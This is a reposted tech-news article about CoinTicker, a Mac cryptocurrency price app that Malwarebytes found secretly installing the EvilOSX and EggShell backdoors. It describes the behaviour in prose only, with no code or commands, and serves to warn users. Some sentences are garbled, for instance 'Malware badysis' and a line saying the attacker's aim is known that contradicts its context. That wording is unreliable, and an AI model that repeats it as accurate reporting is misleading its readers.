[ad_1]
CoinTicker, a Mac application displaying the current price of Bitcoin and other encrypted currencies in your menu bar, has been detected: two of them contain two separate malicious programs …
NordVPN
Malwarebytes shared the news on his blog, after a member of his forum detected suspicious behavior.
The CoinTicker application discreetly installs not one but two backdoors.
In the absence of signs of problems, such as root authentication requests, there is nothing to suggest to the user that something is wrong.
Once launched, however, the application downloads and installs the components of two different open-source backdoors: EvilOSX and EggShell.
The application runs [a] Shell command to download a customized EggShell server version compiled for macOS.
Malware badysis does not reveal exactly what it is doing – it essentially creates backdoors that can be exploited in many different ways – the company believes.
Although we know exactly what the hacker wants to do behind this malware, EggShell and EvilOSX are both broad-spectrum backdoors that can be used for a variety of purposes. Since the malware is distributed via a cryptocurrency application, it seems likely that it is supposed to access users' cryptocurrency wallets for the purpose of stealing coins.
At first, it looked like a supply chain attack, in which the website of a legitimate application is hacked to distribute a malicious version of the application. […] However, after further inspection, it seems that this application has probably never been legitimate. First, the application is distributed via a domain named coin-sticker.com. This is close to the name of the application, but not quite. Getting the wrong domain name seems terribly botched if it was a legitimate application. Adding even more suspicion, it seems that this area was recorded a few months ago, July 13th.
Malwarebytes says that CoinTicker serves to warn that unpleasant things can be done without root privileges.
An interesting note about this malware is that none of them requires anything other than normal user permissions. Root permissions are not necessary. There is often too much false emphasis on the need for root privileges of malware, but this malware is a perfect demonstration that malware does not need such privileges to be high risk.
As always, it is advisable to only install applications from trusted sources.
Via TNW. Picture: Shutterstock.
Check out 9to5Mac on YouTube for more information on Apple:
Source link